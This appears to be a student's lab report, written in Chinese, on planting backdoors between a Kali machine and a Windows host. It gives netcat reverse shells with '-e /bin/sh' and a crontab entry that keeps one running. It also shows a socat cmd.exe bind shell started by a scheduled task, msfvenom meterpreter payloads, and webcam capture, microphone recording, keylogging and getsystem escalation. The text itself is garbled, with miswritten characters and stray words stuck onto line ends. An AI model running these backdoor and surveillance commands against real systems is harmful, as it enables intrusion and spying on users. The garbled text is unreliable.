1、實驗內容說明及基礎問題回答
2、工具準備linux
3、實驗過程web
4、問題與思考
shell
一、實驗內容
(1)使用netcat獲取主機操做Shell,cron啓動 (0.5分)windows
(2)使用socat獲取主機操做Shell, 任務計劃啓動 (0.5分)網絡
(3)使用MSF meterpreter(或其餘軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell(0.5分)tcp
(4)使用MSF meterpreter(或其餘軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權 (2分)編輯器
(5)可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell(1分)加份內容一併寫入本實驗報告。工具
二、基礎問題回答
1)例舉你能想到的一個後門進入到你係統中的可能方式?ui
(2)例舉你知道的後門如何啓動起來(win及linux)的方式?命令行
(3)Meterpreter有哪些給你映像深入的功能?
(4)如何發現本身有系統有沒有被安裝後門?
Windows下用命令ipconfig
Linux下用ifconfig
使用ncat程序,輸入ncat.exe -l -p 5226
監聽本機5226端口
在kali中使用nc指令的-e
選項,輸入nc 172.30.2.26 5226 -e /bin/sh
反向鏈接Windows主機的5226端口
在Windows端,得到kali的shell
使用nc
指令監聽5226
端口
在Windows下,使用ncat.exe
程序的-e
選項反向鏈接kali主機的5226
端口
此時kali能夠看到Windows的命令提示,能夠輸入相關Windows命令(此處輸入的是dir
)
Windows監聽5226
端口
Kali下鏈接到Windows的5226
端口
創建鏈接後傳輸數據
使用netcat獲取主機操做Shell,cron啓動
在Windows下監聽5226
端口
在kali中,用crontab -e
編輯一條定時任務,選擇編輯器3
在最後一行添加30 * * * * /bin/netcat 172.30.2.26 5226 -e /bin/sh
,意思是在每小時的第30分鐘反向鏈接Windows主機的5226
端口
時間到了23:30時,已經得到kali的shell,能夠輸入指令
使用socat獲取主機操做Shell, 任務計劃啓動
socat
是ncat
的加強版,它使用的格式是socat [options] <address> <address>
,其中兩個address是必選項,而options 是可選項。
socat的基本功能就是創建兩個雙向的字節流,數據就在其間傳輸,參數address就是表明了其中的一個方向。所謂流,表明了數據的流向,而數據則能夠有許多不一樣的類型,命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。
在win10系統下,右擊屏幕左下角windows圖標,選擇「計算機管理」(或者直接搜索「計算機管理」)
在任務計劃程序建立任務,填寫任務名稱,並新建一個觸發器
在操做->程序或腳本中選擇你的socat.exe
文件的路徑,在添加參數一欄填寫tcp-listen:5226 exec:cmd.exe,pty,stderr
,這個命令的做用是把cmd.exe
綁定到端口5226
,同時把cmd.exe
的stderr
重定向到stdout
上
建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,找到你建立的任務雙擊後,能夠發現以前建立的任務已經開始運行
此時,在Kali環境下輸入指令socat - tcp:172.30.2.26:5226
,這裏的第一個參數-
表明標準的輸入輸出,第二個流鏈接到Windows主機的5226端口,此時能夠發現已經成功得到了一個cmd shell
使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell
輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.130 LPORT=5226 -f exe > 20165226_backdoor.exe
生成後門程序
注意此時IP地址爲LinuxIP
ncat.exe -lv 5226 > 20165226_backdoor.exe
,進入接受模式Linux中執行nc 172.30.2.26 5226 < 20165226_backdoor.exe
,注意關閉病毒查殺軟件
此時IP地址爲主機即WindowsIP
傳送接收文件成功
在kali中打開終端,輸入msfconsole
指令進入msf控制檯
輸入use exploit/multi/handler
進入監聽模塊
輸入set payload windows/meterpreter/reverse_tcp
設置payload
依次輸入set LHOST 192.168.170.130
和set LPORT 5226
設置IP及端口
注意此時IP地址爲LinuxIP,和生成後門程序時指定的IP相同
設置完成,開始監聽exlpoit
運行Windows下的後門程序
kali已經得到Windows主機的鏈接,並獲得遠程控制的shell
使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容
使用record_mic
指令能夠截獲一段音頻
使用webcam_snap
指令可使用攝像頭進行拍照
使用screenshot
指令能夠進行截屏
使用keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄
先使用getuid
指令查看當前用戶,使用getsystem
指令進行提權
可選加份內容:使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈鏈接Shell
使用命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.170.128 LPORT=5226 -x /root/20165226/exp2/pwn1 -f elf > 5226pwn
生成以pwn1模板這個elf文件格式的shellcode文件5226pwn
msfconsole
,進入msf命令行use exploit/multi/handler /*進入handler模式*/ set payload linux/x86/meterpreter/reverse_tcp /*對應生成的後門程序設置payload*/ show options /*查看當前信息狀態*/ set LHOST 192.168.170.128 /*設置LHOST,其中ip爲攻擊者Linux的ip*/ set LPORT 5226 /*設置LPORT*/ exploit /*啓動監聽*/
在kali中執行pwn2時應先加權限 chmod +x 5226pwn
問題1:kali使用nc反彈鏈接後主機沒有任何顯示
問題1解決方案:在空白處輸入命令,如ls
等,再回車便可
問題2解決方案:
經過從新查看編輯文件,發現並未寫入端口號
因而將最後一行改成
30 * * * * /bin/netcat 172.30.2.26 5226 -e /bin/sh
問題3:在進行第二個socat實驗時未成功得到cmd shell
問題3解決方案:經過校對命令行,發現輸入命令時將-
和tcp:
連在一塊兒了,正確書寫爲socat - tcp:....
,必定注意之間的空格
問題4:MSF監聽時最後沒法獲取信息
問題4解決方案:發現是在IP設置時出現問題,從新啓動終端將步驟從頭調試。
返回目錄